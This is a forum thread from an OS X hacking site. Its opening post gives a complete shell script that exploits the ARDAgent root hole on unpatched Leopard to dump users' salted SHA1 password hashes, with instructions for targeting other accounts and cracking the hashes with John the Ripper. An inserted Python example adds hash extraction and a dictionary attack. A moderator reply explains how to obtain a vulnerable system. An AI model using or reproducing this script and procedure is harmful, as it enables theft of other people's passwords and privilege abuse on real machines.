[Security] Dumping and Bruteforcing Password Hashes on Leopard (OSX Security forum, Hackint0sh.org)
  1. #1
    sam (Chief of Administration, iPhone Dev Team; joined Jun 2007; 1,852 posts)

    [Security] Dumping and Bruteforcing Password Hashes on Leopard

    From an anonymous contributor, this interesting article:

    Dumping and Bruteforcing Password Hashes on Leopard

    =============================================
    ====This is for educational purposes only, do not use maliciously====
    =============================================

    Like on Tiger, salted SHA1 hashes of the password can be dumped. But there is one catch: the user must have root. This can be done by using the newly found ARDAgent exploit. Attached to this post is a .sh script archived in a zip file. This script WILL NOT work if the ARDAgent exploit has been fixed on the target computer. To run the script, do the following in Terminal (/Applications/Utilities):

    cd /path/to/the/folder/containing/the/script/
    chmod +x passdump.sh
    ./passdump.sh

    From there, you will see a lot of information, and then a file (named theUserName.hash.txt) will be written to your desktop containing the username whose password was dumped and the salted SHA1 hash associated with that username. This txt file can be run through a bruteforce application named John the Ripper (http://www.openwall.com/john/). A modified build is needed for detecting this hash correctly. This build is found here:

    ftp://ftp.openwall.com/pub/projects/...7.2-macosx.zip

    Once you download this, just unzip it, and do the following in Terminal:

    cd <Drag the unzipped folder into the window>
    cd run
    ./john --format=salt-sha1 ~/Desktop/theUserName.hash.txt

    From there, John the Ripper will bruteforce the password. The time it takes to get the password will depend on the size and security of the password. Make sure you replace theUserName in the Terminal commands with the one of the file on your desktop. John should say:
    Loaded 1 password hash (Salt SHA1 [salt-sha1])

    Once John has gotten your password, it will display it as follows:
    thePassword (theUserName)


    One thing to note: If you want to dump the password of a user that is not the current user, then change this line in the passdump.sh:

    CURRENTUSER=`whoami`

    to:

    CURRENTUSER="theUserNameToDump"


    Remember, this is for educational purposes only, do not use it maliciously.

    Here is the script, just put it into a file named passdump.sh:

    Code:
    #!/bin/sh
    # Dumps a user's Leopard salted SHA1 hash by running commands as root through
    # ARDAgent (the unpatched "do shell script" hole), then writes user:hash to the
    # desktop in the form John the Ripper expects.

    printf '\nWelcome.\n'
    echo "====================================================================="
    echo "====This is for educational purposes only, do not use maliciously===="
    echo "====================================================================="
    sleep 2
    echo "For this to work correctly, the ARDAgent exploit must be enabled."
    echo " "
    echo "Testing to see if the exploit is enabled..."
    echo " "

    # Ask ARDAgent to run whoami; on a vulnerable machine the answer is root
    EXPUSER=`osascript -e 'tell application "ARDAgent" to do shell script "whoami"' 2> /dev/null`

    if [ "$EXPUSER" = "root" ]; then
        printf 'The exploit is enabled, continuing..\n\n'

        # Change this line to dump another user's hash (see the note above)
        CURRENTUSER=`whoami`

        if [ "$CURRENTUSER" = "root" ]; then
            echo "Getting password for user 'root' is not allowed."
            echo "Please run this without being root."
            exit 1
        fi

        printf 'Getting password for the user %s\n\n' "$CURRENTUSER"

        # The hash file is named after the account's GeneratedUID (a GUID), not the numeric uid
        USERUID=`dscl localhost -read /Search/Users/$CURRENTUSER | grep GeneratedUID | sed s/GeneratedUID:\ //`

        if [ -z "$USERUID" ]; then
            echo "Could not find a GeneratedUID for $CURRENTUSER."
            exit 1
        fi

        echo "The GeneratedUID of $CURRENTUSER is $USERUID"

        # Characters 169-216 of /var/db/shadow/hash/<GeneratedUID> hold the salted SHA1
        # (8 hex chars of salt followed by 40 hex chars of hash). The file is readable
        # by root only, so it is read through ARDAgent as well.
        SALTEDSHA=`sh -c "osascript -e 'tell application \"ARDAgent\" to do shell script \"cat /var/db/shadow/hash/$USERUID | cut -c169-216\"'" 2> /dev/null`

        if [ -z "$SALTEDSHA" ]; then
            echo "Could not read the hash file for $CURRENTUSER."
            exit 1
        fi

        printf 'The salted SHA1 hash is %s\n\n' "$SALTEDSHA"
        echo "$CURRENTUSER:$SALTEDSHA" > ~/Desktop/$CURRENTUSER.hash.txt
        echo "The hash was written to ~/Desktop/$CURRENTUSER.hash.txt, which can be run through a modified John the Ripper, found here:"
        echo "ftp://ftp.openwall.com/pub/projects/john/contrib/osx/john-1.7.2-macosx.zip"
    else
        echo "The ARDAgent exploit is not enabled, so therefore, this will not work."
        exit 1
    fi
    Last edited by sam; 07-09-2008 at 02:10 AM.
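As an added example (not part of the original post or of passdump.sh), the following Python reconstructs what the script extracts and what John is then left to do: it builds a constructed Leopard-style hash record, takes the same character window 169-216 that `cut -c169-216` takes, writes the user:hash line in the format the post feeds to John, and runs a small dictionary attack by recomputing SHA1(salt || candidate) for each word. The 1240-character record length, the user name, the salt and the word list are assumptions made for the sample; the salt-then-password SHA1 construction with a 4-byte salt is the Leopard salted-SHA1 scheme that the salt-sha1 format of the modified John build targets.

```python
import hashlib
from typing import Iterable, Optional

# Layout of a Leopard /var/db/shadow/hash/<GeneratedUID> file as the post uses it:
# a long hex string in which characters 169-216 (1-based, as in `cut -c169-216`)
# are the salted SHA1: 8 hex chars of a 4-byte salt followed by 40 hex chars of
# SHA1(salt || password). RECORD_LEN is an assumption for the constructed sample;
# only the 169-216 window matters to the script and to John.
RECORD_LEN = 1240
SALTED_SHA1_START = 168      # 0-based offset of cut's character 169
SALTED_SHA1_LEN = 48         # 8 hex (salt) + 40 hex (SHA1)
HEX_DIGITS = set("0123456789abcdefABCDEF")


def salted_sha1(salt: bytes, password: str) -> str:
    """Hex salt + hex SHA1(salt || password): the 48-char field John calls salt-sha1."""
    if len(salt) != 4:
        raise ValueError("Leopard salt is 4 bytes")
    digest = hashlib.sha1(salt + password.encode("utf-8")).hexdigest()
    return salt.hex() + digest


def build_record(salt: bytes, password: str) -> str:
    """Constructed sample of a hash file: zeros everywhere except the salted SHA1 window."""
    field = salted_sha1(salt, password)
    record = "0" * SALTED_SHA1_START + field
    return record + "0" * (RECORD_LEN - len(record))


def extract_salted_sha1(record: str) -> str:
    """The same slice the script takes with `cut -c169-216`, with a sanity check on it."""
    field = record[SALTED_SHA1_START:SALTED_SHA1_START + SALTED_SHA1_LEN]
    if len(field) != SALTED_SHA1_LEN or any(c not in HEX_DIGITS for c in field):
        raise ValueError("record does not carry a 48-hex-char salted SHA1 at 169-216")
    return field.lower()


def hash_line(user: str, record: str) -> str:
    """What passdump.sh writes to ~/Desktop/<user>.hash.txt."""
    return f"{user}:{extract_salted_sha1(record)}"


def crack(line: str, wordlist: Iterable[str]) -> Optional[str]:
    """Dictionary attack on one user:salted-sha1 line, as John does for this format:
    split off the 4-byte salt, then recompute SHA1(salt || candidate) per word."""
    _user, field = line.strip().split(":", 1)
    salt = bytes.fromhex(field[:8])
    target = field[8:].lower()
    for candidate in wordlist:
        if hashlib.sha1(salt + candidate.encode("utf-8")).hexdigest() == target:
            return candidate
    return None


if __name__ == "__main__":
    # Constructed sample: user "alice", salt 0a1b2c3d, password "hunter2"
    record = build_record(bytes.fromhex("0a1b2c3d"), "hunter2")
    line = hash_line("alice", record)
    print(line)
    print("Loaded 1 password hash")
    found = crack(line, ["password", "letmein", "hunter2", "qwerty"])
    print(f"{found} (alice)" if found else "no match in wordlist")
```

Note the asymmetry the example makes visible: the salt defeats a precomputed table, but it does nothing against a per-hash dictionary run, which is why the post's advice about "size and security of the password" is the only thing that actually slows John down here.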



  2. #2
    Newbie (joined Jul 2008; 1 post)

    Interesting…props to whoever made this.
    Last edited by pater; 07-09-2008 at 02:32 AM.

  3. #3
    Professional (joined May 2008; 59 posts)

    Interesting…props to whoever made this.

  4. #4
    Newbie (joined Aug 2008; 4 posts)

    great post!!! more security threads!!!!

  5. #5
    Newbie (joined May 2011; 1 post)

    ARDAgent exploit?

    I'm basically following a tutorial to see if it can be done.

    But in order to do it I need to have the ARDAgent exploit enabled. How do I do that? How can I enable it?

    Thanks for the quick answer.

    -OneProto
    Last edited by Olethros; 05-25-2011 at 07:48 AM.


  6. #6
    Olethros (Super Moderator; Norway; joined Sep 2007; 8,360 posts)

    Quote Originally Posted by OneProto:
    I'm basically following a tutorial to see if it can be done.

    But in order to do it I need to have the ARDAgent exploit enabled. How do I do that? How can I enable it?

    Thanks for the quick answer.

    -OneProto
    If you read the first post again, you will see that they mean you have to find a version of Leopard where a security fix (or 10.5.x update) hasn't yet been applied to close this exploit.
    In other words, try with a vanilla unpatched 10.5 (or go and search for which apple update first closed this bug. Then update your vanilla 10.5 install to include all updates that were released prior to the bug fixing update)

  7. #7
    Newbie (joined Mar 2014; 7 posts)

    Hi, useful post. Thanks.

 

 
